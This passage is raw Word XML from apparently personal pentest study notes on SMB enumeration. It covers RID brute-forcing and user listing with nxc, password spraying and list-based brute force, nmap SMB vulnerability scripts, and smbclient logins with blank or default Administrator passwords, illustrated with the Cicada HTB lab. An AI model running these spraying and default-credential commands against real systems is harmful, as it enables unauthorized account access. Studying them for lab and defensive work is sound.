        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The last part (&lt;rid&gt;) is the RID. Common RIDs include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">500 → Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">501 → Guest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1279"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1000+ → Normal user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000134F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3086100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49" name="image63.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image63.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36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1350">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the output of the rid-brute, and we can see that we got a lot of users. All the users are associated with the "(SidTypeUser)" on the right side</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001351">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="588"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cicada HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">,  we had found a password from the SMB share, so now we have usernames so we can brute force the username with the password, by putting these usernames in a text file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001352">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001353">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u 'guest' -p ''</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001354">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The difference between</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> rid-brute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is that the rid-brute gives more information than just users (ex. groups), and ALSO that users includes "descriptions" for each user, which in the Cicada HTB actually gave us a password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001355">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1460500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74" name="image70.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image70.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId369"/>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1356">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7bdzst5ykcyt" w:id="162"/>
      <w:bookmarkEnd w:id="162"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bruteforce enumeration with a username list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001357">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p "random password" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001358">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users.txt is a text file where each username is in it's own line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="601"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the password with your desired password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="825500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="528" name="image507.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image507.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId370"/>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135B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From this output, michael.wrightson (on the bottom) is the only one that the password worked for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can use his username and password to enumerate the shares using the "--shares" flag just like before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="590"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can also rerun the "--rid-brute" flag with the username and password since it might give us new users now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000135F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8huge4ebglnl" w:id="163"/>
      <w:bookmarkEnd w:id="163"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bruteforce enumeration with a username list and password list:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001360">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc smb 10.10.10.10 -u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001361">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is only theoretical. I know this works on crackmapexec though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001362">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This should try all combinations of users and passwords, like all the usernames will be combined with all the passwords, not just like a one-to-one relationship. At least crackmapexec does that</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001363">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001364">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mv19srmv7oh7" w:id="164"/>
      <w:bookmarkEnd w:id="164"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate SMB using nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001365">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [MACHINE_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001366">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ce0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap {ip} --script=smb-vuln*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001367">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L [MACHINE_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001368">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The -L stands for "list", as in list the share names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001369">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TRY EMPTY PASSWORD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It often requires a password and just list the names, while the nmap scan with the script usually tells us about the permissions and WAY more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L [MACHINE_IP] -U Administrator </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then try a blank password or another password like "Administrator"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L [MACHINE_IP] -U Admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="736"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then try a blank password or another password like "Admin"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000136F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001370">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to inspect a specific SMB Share:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001371">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //MACHINE_IP/SHARE_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001372">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ce0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient //MACHINE_IP/SHARE_NAME -N</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001373">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "-N" stands for no password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001374">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ce0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
